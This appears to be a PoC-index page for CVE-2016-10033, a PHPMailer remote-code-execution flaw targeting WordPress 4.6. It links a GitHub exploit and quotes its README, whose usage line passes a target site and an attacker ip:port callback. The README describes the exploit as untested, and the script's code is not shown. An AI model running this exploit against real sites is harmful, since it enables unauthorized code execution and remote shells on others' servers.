CVE-2016-10033 PoC — PHPMailer 安全漏洞

Source

https://github.com/GeneralTesler/CVE-2016-10033

Associated Vulnerability

Title:PHPMailer 安全漏洞 (CVE-2016-10033)
Description:The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.

Description

RCE against WordPress 4.6; Python port of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Readme

# PoC for CVE-2016-10033

**RCE against WordPress 4.6**

usage:
```
./CVE-2016-10033.py <target site> <your ip:port> <username>
```
example: 
```
./CVE-2016-10033.py http://site.com/ 1.2.3.4:4444 admin
```

---

Python port (+alterations) of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html 

Required: Requests (pip install requests)

---

I haven't had the chance to test this so please let me know about your results

File Snapshot


 [4.0K]  /data/pocs/edb74633278ef0670d5fedd7f026fe43d151ac6d
├── [2.6K]  CVE-2016-10033.py
└── [ 453]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!